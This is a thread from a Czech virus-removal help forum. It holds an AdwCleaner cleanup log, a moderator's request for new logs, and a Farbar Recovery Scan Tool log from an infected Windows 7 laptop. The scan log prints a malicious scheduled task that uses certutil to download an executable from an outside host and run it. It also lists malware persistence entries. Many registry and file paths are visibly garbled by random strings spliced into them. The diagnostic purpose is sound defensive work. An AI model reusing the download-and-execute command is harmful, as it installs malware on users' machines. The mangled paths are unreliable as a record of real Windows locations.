Deleted C:\Users\Jomko\AppData\Local\DriverToolkit
Deleted C:\Users\Jomko\AppData\Roaming\EpicNet Inc
Not Deleted C:\Windows\rss
***** [ Files ] *****
Deleted C:\Windows\Reimage.ini
Deleted C:\Windows\System32\drivers\Winmon.sys
Deleted C:\Windows\System32\drivers\WinmonFS.sys
Deleted C:\Windows\System32\drivers\WinmonProcessMonitor.sys
Deleted C:\Windows\restoro.ini
Deleted C:\Windows\windefender.exe
***** [ DLL ] *****
No malicious DLLs cleaned.
***** [ WMI ] *****
No malicious WMI cleaned.
***** [ Shortcuts ] *****
No malicious shortcuts cleaned.
***** [ Tasks ] *****
Deleted C:\Windows\System32\Tasks\SCHEDULEDUPDATE
***** [ Registry ] *****
Deleted HKCU\Software\DriverToolkit
Deleted HKCU\Software\EpicNet Inc.
Deleted HKCU\Software\GCleaner
Deleted HKCU\Software\Lavasoft\Web Companion
Deleted HKCU\Software\Local AppWizard-Generated Applications\Restoro
Deleted HKCU\Software\Microsoft\Internet Explorer\Main|Start Page
Deleted HKCU\Software\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7xt\Settings\{10ECCE17-29B5-4880-A8F5-EAD298611484}
Deleted HKCU\Software\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7nternet Settings\ZoneMap\Domains\webcompanion.com
Deleted HKCU\Software\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7un|cloudnet
Deleted HKCU\Software\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ninstall\CloudNet
Deleted HKCU\Software\Reimage
Deleted HKCU\Software\Restoro
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ntrol.DLL
Deleted HKLM\SOFTWARE\MICROSOFT\Speedycar
Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0760CF23-E27C-42D7-9E44-6B3896E46166}
Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ScheduledUpdate
Deleted HKLM\Software\Classes\AppID\{28FF42B8-A0DA-4BE5-9B81-E26DD59B350A}
Deleted HKLM\Software\Classes\CLSID\{10ECCE17-29B5-4880-A8F5-EAD298611484}
Deleted HKLM\Software\Classes\CLSID\{801B440B-1EE3-49B0-B05D-2AB076D4E8CB}
Deleted HKLM\Software\Classes\CLSID\{AE198C69-7358-4856-9029-F4C0FAD524C1}
Deleted HKLM\Software\Classes\CLSID\{BA827421-E282-479E-AE60-34796877B8AE}
Deleted HKLM\Software\Classes\Interface\{9BB31AD8-5DB2-459E-A901-DEA536F23BA4}
Deleted HKLM\Software\Classes\Interface\{BD51A48E-EB5F-4454-8774-EF962DF64546}
Deleted HKLM\Software\Classes\REI_AxControl.ReiEngine
Deleted HKLM\Software\Classes\REI_AxControl.ReiEngine.1
Deleted HKLM\Software\Classes\TypeLib\{FA6468D2-FAA4-4951-A53B-2A5CF9CC0A36}
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7sktopnew
Deleted HKLM\Software\Reimage
Deleted HKLM\Software\Restoro
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7eb Companion
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\AddressBook|DisplayIcon
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\AddressBook|UninstallString
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\Aomei Partition Assistant_is1|DisplayIcon
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\Aomei Partition Assistant_is1|UninstallString
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\Connection Manager|DisplayIcon
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\Connection Manager|UninstallString
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\DirectDrawEx|DisplayIcon
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\DirectDrawEx|UninstallString
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\Fontcore|DisplayIcon
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\Fontcore|UninstallString
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\IE40|DisplayIcon
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\IE40|UninstallString
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\IE4Data|DisplayIcon
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\IE4Data|UninstallString
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\IE5BAKEX|DisplayIcon
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\IE5BAKEX|UninstallString
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\IEData|DisplayIcon
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\IEData|UninstallString
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\MobileOptionPack|DisplayIcon
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\MobileOptionPack|UninstallString
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\SchedulingAgent|DisplayIcon
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\SchedulingAgent|UninstallString
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\WIC|DisplayIcon
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\WIC|UninstallString
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7KzPTw5jtS38n2tVEGi.DLL
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ppID\{28FF42B8-A0DA-4BE5-9B81-E26DD59B350A}
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7nterface\{9BB31AD8-5DB2-459E-A901-DEA536F23BA4}
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7nterface\{BD51A48E-EB5F-4454-8774-EF962DF64546}
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ypeLib\{FA6468D2-FAA4-4951-A53B-2A5CF9CC0A36}
***** [ Chromium (and derivatives) ] *****
No malicious Chromium entries cleaned.
***** [ Chromium URLs ] *****
No malicious Chromium URLs cleaned.
***** [ Firefox (and derivatives) ] *****
No malicious Firefox entries cleaned.
***** [ Firefox URLs ] *****
No malicious Firefox URLs cleaned.
***** [ Hosts File Entries ] *****
No malicious hosts file entries cleaned.
***** [ Preinstalled Software ] *****
No Preinstalled Software cleaned.
*************************
[+] Delete Tracing Keys
[+] Reset Winsock
*************************
AdwCleaner[S00].txt - [8322 octets] - [07/02/2020 20:41:39]
########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C00].txt ##########
-
Rudy
- Site Admin
- Příspěvky: 118275
- Registrován: 30 říj 2003 13:42
- Bydliště: Plzeň
- Kontaktovat uživatele:
Re: Prosím o kontrolu logu FRST
Dejte nové logy FRST+Addition.
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Re: Prosím o kontrolu logu FRST
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 02-02-2020 02
Ran by Jomko (administrator) on JOMKO_WIN7 (TOSHIBA SATELLITE P50-A-13C) (07-02-2020 20:55:17)
Running from C:\Users\Jomko\Desktop
Loaded Profiles: Jomko (Available Profiles: Jomko)
Platform: Windows 7 Professional Service Pack 1 (X64) Language: Slovenčina (Slovensko)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/33 ... scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
() [File not signed] C:\Windows\rss\csrss.exe
(Access Denied) [File not signed] C:\Windows\windefender.exe
(ActMask Group Co., Ltd -> ActMask Co.,Ltd - hxxp://WWW.ALL2PDF.COM) C:\Windows\System32\PrintCtrl.exe
(ActMask Group Co., Ltd -> ActMask Co.,Ltd - hxxp://www.all2pdf.com) C:\Windows\System32\PrintDisp.exe
(ActMask Group Co., Ltd -> ActMask Co.,Ltd - hxxp://www.all2pdf.com) C:\Windows\System32\PrintDisp.exe
(Adobe Inc. -> Adobe Systems) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\AdminService.exe
(Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe
(Atheros Communications Inc. -> Atheros Communications) [File not signed] C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe
(EpicNet Inc.) [File not signed] C:\Users\Jomko\AppData\Local\Temp\csrss\cloudnet.exe
(Google Inc -> Google Inc.) C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
(IDT, Inc.) [File not signed] C:\Program Files\IDT\WDM\stacsv64.exe
(Intel Corporation - Software and Firmware Products -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(Intel Corporation -> ) C:\Windows\System32\igfxTray.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxHK.exe
(Intel Corporation-Wireless Connectivity Solutions -> Intel Corporation) C:\Windows\System32\ibtsiva.exe
(Intel(R) Wireless Connectivity Solutions -> Intel(R) Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Intel(R) Wireless Connectivity Solutions -> Intel(R) Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Intel(R) Wireless Connectivity Solutions -> Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(Intel(R) Wireless Connectivity Solutions -> Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exe
(Intel(R) Wireless Connectivity Solutions -> Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\mediasrv.exe
(Intel(R) Wireless Connectivity Solutions -> Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\obexsrv.exe
(Logitech Inc -> Logitech) C:\ProgramData\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ent\LogiOverlay.exe
(Logitech Inc -> Logitech, Inc.) C:\Program Files\Logitech\LogiOptions\LogiOptions.exe
(Logitech Inc -> Logitech, Inc.) C:\ProgramData\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ent\laclient\laclient.exe
(Logitech Inc -> Logitech, Inc.) C:\ProgramData\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ent\LogiOptionsMgr.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wlanext.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.) C:\Program Files\SoftEther VPN Client\vpnclient_x64.exe
(SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.) C:\Program Files\SoftEther VPN Client\vpnclient_x64.exe
(SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.) C:\Program Files\SoftEther VPN Client\vpncmgr_x64.exe
(Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Windows Media Audio AEC for Media Foundation) (Access Denied) C:\ProgramData\x86_microsoft-windows-d..directplay4-payload_31bf3856ad364e35_1.0.18362.1_none_148c99f79b506e6c\PortableDeviceClassExtension.exe
(Wondershare Technology Co.,Ltd -> Wondershare) C:\Program Files (x86)\Wondershare\WAF\2.4.2.223\WsAppService.exe
==================== Registry (Whitelisted) ===================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [BTMTrayAgent] => C:\Program Files (x86)\Intel\Bluetooth\btmshellex.dll [7953576 2017-05-10] (Intel(R) Wireless Connectivity Solutions -> Motorola Solutions, Inc.)
HKLM\...\Run: [PrintDisp] => C:\Windows\system32\PrintDisp.exe [588936 2015-08-18] (ActMask Group Co., Ltd -> ActMask Co.,Ltd - hxxp://www.all2pdf.com)
HKLM\...\Run: [AtherosBtStack] => C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe [976032 2011-09-16] (Atheros Communications Inc. -> Atheros Communications) [File not signed]
HKLM\...\Run: [AthBtTray] => C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe [799904 2011-09-16] (Atheros Communications Inc. -> Atheros Commnucations) [File not signed]
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2778864 2014-08-06] (Synaptics Incorporated -> Synaptics Incorporated)
HKLM\...\Run: [SoftEther VPN Client UI Helper] => C:\Program Files\SoftEther VPN Client\vpnclient_x64.exe [5248312 2019-05-12] (SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [302904 2019-08-27] (Apple Inc. -> Apple Inc.)
HKLM\...\Run: [LogiOptions] => C:\Program Files\Logitech\LogiOptions\LogiOptions.exe [2109064 2019-11-27] (Logitech Inc -> Logitech, Inc.)
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [292848 2013-04-11] (Intel Corporation - Software and Firmware Products -> Intel Corporation)
HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [646160 2019-12-11] (Oracle America, Inc. -> Oracle Corporation)
HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\...\Run: [CCleaner Monitoring] => "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\...\Run: [CloudNet] => C:\Users\Jomko\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2020-02-07] (EpicNet Inc.) [File not signed] <==== ATTENTION
HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\Software\Policies\...\system: [disablecmd] 0
HKU\S-1-5-18\...\Run: [GarminExpress] => C:\Program Files (x86)\Garmin\Express\express.exe [30860272 2019-06-18] (Garmin International, Inc. -> Garmin Ltd. or its subsidiaries)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\79.0.3945.130\Installer\chrmstp.exe [2020-01-23] (Google LLC -> Google LLC)
HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> "C:\Program Files (x86)\Google\Chrome\Application\63.0.3239.132\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level
HKLM\Software\...\Authentication\Credential Providers: [{ACFC407B-266C-8504-8DAE-F3E276336E4B}] -> C:\Windows\system32\AthCredentialProvider.dll [2011-09-16] (Atheros Communications Inc. -> Atheros Commnucations) [File not signed]
HKLM\Software\...\Authentication\Credential Provider Filters: [{ACFC407B-266C-8504-8DAE-F3E276336E4B}] -> C:\Windows\system32\AthCredentialProvider.dll [2011-09-16] (Atheros Communications Inc. -> Atheros Commnucations) [File not signed]
AppInit_DLLs: C:\Windows\System32\nvinitx.dll => C:\Windows\System32\nvinitx.dll [182040 2019-04-17] (NVIDIA Corporation-PE-Prod-Sha1 -> NVIDIA Corporation)
AppInit_DLLs: C:\Windows\System32\nvinitx.dll => C:\Windows\System32\nvinitx.dll [182040 2019-04-17] (NVIDIA Corporation-PE-Prod-Sha1 -> NVIDIA Corporation)
AppInit_DLLs: ,C:\Windows\system32\nvinitx.dll => C:\Windows\system32\nvinitx.dll [182040 2019-04-17] (NVIDIA Corporation-PE-Prod-Sha1 -> NVIDIA Corporation)
AppInit_DLLs-x32: C:\Windows\SysWOW64\nvinit.dll => C:\Windows\SysWOW64\nvinit.dll [159480 2019-04-17] (NVIDIA Corporation-PE-Prod-Sha1 -> NVIDIA Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\SoftEther VPN Client Manager Startup.lnk [2019-05-12]
ShortcutTarget: SoftEther VPN Client Manager Startup.lnk -> C:\Program Files\SoftEther VPN Client\vpncmgr_x64.exe (SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.)
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
==================== Scheduled Tasks (Whitelisted) ============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {043F5EB4-82CE-46AA-BE56-7668C5C64C5E} - System1AKVrrKGSDtbLrcW77HPEwrJM2Ej2yFNYw => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe
Task: {1DE2EE32-D3F2-49E9-A9B3-B3B665DC515B} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1240656 2019-09-10] (Adobe Inc. -> Adobe Systems)
Task: {28B0A694-674F-4F77-AE22-288A79215844} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://bestblues.tech/app/app.exe C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.exe && C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.exe /31340 <==== ATTENTION
Task: {2D417548-BA65-4EE7-8774-0A7D26D81927} - System32\Tasks\GarminUpdaterTask => C:\Program Files (x86)\Garmin\Express SelfUpdater\ExpressSelfUpdater.exe [40432 2019-06-18] (Garmin International, Inc. -> )
Task: {51CC2622-5A74-4047-8C6D-C3C3CC65EC8A} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7rvice.exe [335416 2020-01-21] (Adobe Inc. -> Adobe)
Task: {5C3781C4-8E63-4EE9-BD6E-23BD81C33BC9} - System32\Tasks\Adobe Flash Player NPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_321_Plugin.exe [1458232 2020-01-21] (Adobe Inc. -> Adobe)
Task: {905A300B-6470-42D2-87C0-0A406C62E55F} - System32\Tasks\IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473 => C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\iumsvc.exe
Task: {93DFD860-E586-4829-B68C-290557118ECF} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [3962368 2020-01-22] () [File not signed] <==== ATTENTION
Task: {973AEEE8-1D02-4786-946B-3A7611DB49FC} - System32\Tasks\HPCustPartic.exe_{497FF387-CFCE-4B3F-9361-4D1F864871FC} => C:\Program Files\HP\HP LaserJet MFP M28-M31\Bin\HPCustPartic.exe [6662792 2018-07-04] (Hewlett Packard -> HP Inc.)
Task: {A4CB1FE6-864E-4AC1-8079-C8F6B56E7208} - System32\Tasks\{E0E271FE-355F-411F-8E13-4141203B01DE} => C:\Windows\system32\pcalua.exe -a "C:\Users\Jomko\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe" -c /uninstall
Task: {DD5C372A-1601-4F80-9BD1-91EBB6A059E8} - System1GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGie => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-01-07] (Google Inc -> Google Inc.)
Task: {E289981D-7DE7-44EA-8295-33A39EFCC113} - System1AKVrrKGSDtbLrcW77HPEwrJM2Ej2yFNYw => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-01-07] (Google Inc -> Google Inc.)
Task: {E6660E0C-2898-438C-92D1-1B9BC249F29E} - System32\Tasks\HPCustParticipation HP LaserJet MFP M28-M31 => C:\Program Files\HP\HP LaserJet MFP M28-M31\Bin\HPCustPartic.exe [6662792 2018-07-04] (Hewlett Packard -> HP Inc.)
Task: {EC032B4F-84FF-4698-AA3E-EB8CEC1F95CE} - System32\Tasks\U-9-6-42-1263061080-1218707829-1038753275-4479\{XXIL7BBA-VLUN-1SE5-VAVW-AAH7L2DBI1PZ} => C:\ProgramData\x86_microsoft-windows-d..directplay4-payload_31bf3856ad364e35_1.0.18362.1_none_148c99f79b506e6c\PortableDeviceClassExtension.exe [0 0000-00-00] (Windows Media Audio AEC for Media Foundation) (Access Denied)
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Winsock: Catalog5 07 C:\Program Files (x86)\Bonjour\mdnsNSP.dll [122128 2015-08-12] (Apple Inc. -> Apple Inc.)
Winsock: Catalog5-x64 07 C:\Program Files\Bonjour\mdnsNSP.dll [133392 2015-08-12] (Apple Inc. -> Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{8A644A86-7EBB-4639-9455-DF1016EC069A}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{FF69FF1A-22D7-4392-824F-9C30EFD876FD}: [DhcpNameServer] 192.168.0.1
Internet Explorer:
==================
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_241\bin\ssv.dll [2020-01-20] (Oracle America, Inc. -> Oracle Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_241\bin\jp2ssv.dll [2020-01-20] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll [2011-09-16] (Atheros Communications Inc. -> Atheros Commnucations) [File not signed]
FireFox:
========
FF DefaultProfile: zzgehp0c.default-1579206376147
FF ProfilePath: C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGiofiles\zzgehp0c.default-1579206376147 [2020-02-07]
FF Extension: (Adaware Secure Search) - C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi\{ec8030f7-c20a-464f-9b0e-13a3a9e97384}\@newtab-omni.xpi [2019-10-20]
FF HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\...\SeaMonkey\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi => not found
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_32_0_0_321.dll [2020-01-21] (Adobe Inc. -> )
FF Plugin: @java.com/DTPlugin,version=11.241.2 -> C:\Program Files\Java\jre1.8.0_241\bin\dtplugin\npDeployJava1.dll [2020-01-20] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.241.2 -> C:\Program Files\Java\jre1.8.0_241\bin\plugin2\npjp2.dll [2020-01-20] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @videolan.org/vlc,version=3.0.8 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_32_0_0_321.dll [2020-01-21] (Adobe Inc. -> )
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2019-12-02] (Adobe Inc. -> Adobe Systems Inc.)
Chrome:
=======
CHR Profile: C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default [2020-01-26]
CHR Notifications: Default -> hxxps://www.youtube.com
CHR Extension: (Prezentácie) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-01-07]
CHR Extension: (SEOquake) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\akdgnmcogleenhbclghghlkkdndkjdjc [2020-01-08]
CHR Extension: (Dokumenty) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2018-01-08]
CHR Extension: (Disk Google) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-01-08]
CHR Extension: (YouTube) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-01-08]
CHR Extension: (Tabuľky) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-01-07]
CHR Extension: (Dokumenty Google v režime offline) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2020-01-26]
CHR Extension: (Tag Assistant (by Google)) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\kejbdjndbnbjgmefkgdddjlbokphdefk [2019-05-08]
